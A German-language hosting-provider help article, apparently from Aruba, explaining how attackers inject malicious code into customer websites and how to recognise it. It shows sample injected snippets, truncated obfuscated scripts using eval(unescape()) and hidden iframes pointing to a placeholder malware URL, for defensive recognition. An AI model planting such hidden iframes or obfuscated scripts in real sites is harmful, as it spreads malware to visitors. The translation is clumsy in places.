Es kann manchmal vorkommen, dass, aufgrund Schwachpunkte der Web-Anwendungen, oder eines Diebstahles der eigenen Zugriffsdaten, in den Seiten der betreffenden Domain, einen potenziell gefährlichen Code eingefügt werden könnte.

Es folgen ein paar Beispiele,  wie dieser Software auftreten könnte:

  • <script>function v47e ...etc... 4950543E'));</script>
  • <iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
  • <script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
  • <!-- ~ --><div style="visibility:hidden"><iframe src="http://url_contenente_malware" width=100 height=80></iframe></div><!-- ~ -->

In der Regel, haben diese Codes eine oder mehreren der folgenden Eigenschaften:

  • Die “visibility:hidden” Eigenschaft, um in der Website als unsichtbar, normal surfen zu können.
  • Sie benutzen eine Codierung um ihren Inhalt dem Resource Code zu verbergen und ihm dessen Lektüre zu verhindern.
  • Sie rufen Arubas Server externe Seiten ab, in der Regel Seiten die auf  kompromittierte  und Malware enthaltende Server ansässig sind.

Der hauptsächlicher Grund, für den jemand versuchen sollte, diese Codes auf eine zulässige Website eingeben könnte, ist die Verbreitung von Malware unter den Besuchern dieser Website.
Praktisch, wenn ein so ähnlicher Code  anwesend ist, wird der Browser von einem hypothetischen Besucher auf einer von diesem Code aufgerufene Externen Seite, wiederadressiert werden.
Auf dieser Seite, kann ein Malware anwesend sein, der versuchen wird, sich auf dem Rechner des Besuchers zu installieren,  indem er eine bestimmte Nummer von bekannten Schwächen auszunutzen wird.
Wenn der PC des Besuchers nicht entsprechend geschützt ist, besteht das Risiko, dass er infiziert wird.
Falls man auf der eigenen Domain, einen wie oben beschriebenen Code erkennen sollte, empfehlen wir die Anweisungen des folgenden Artikel durchzulesen:
Was man in Anwesenheit von Böswilligen Code auf der eigenen Website, tun kann“.